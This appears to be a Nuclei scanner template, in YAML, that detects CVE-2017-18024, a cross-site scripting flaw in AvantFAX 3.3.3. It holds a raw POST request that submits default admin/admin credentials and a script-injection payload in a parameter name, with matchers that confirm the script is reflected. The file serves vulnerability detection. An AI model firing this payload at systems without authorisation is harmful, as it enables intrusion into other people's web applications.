40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
|
id: CVE-2017-18024
|
||
|
|
||
|
info:
|
||
|
name: AvantFAX 3.3.3 XSS
|
||
|
author: pikpikcu
|
||
|
severity: medium
|
||
|
reference: |
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-18024
|
||
|
- http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
|
||
|
- https://hackerone.com/reports/963798
|
||
|
description: |
|
||
|
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
|
||
|
tags: cve,cve2017,xss,avantfax
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST / HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
Content-Length: 44
|
||
|
|
||
|
username=admin&password=admin&_submit_check=1&jlbqg%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eb7g0x=1
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- '<script>alert(document.domain)</script>'
|
||
|
part: body
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- "text/html"
|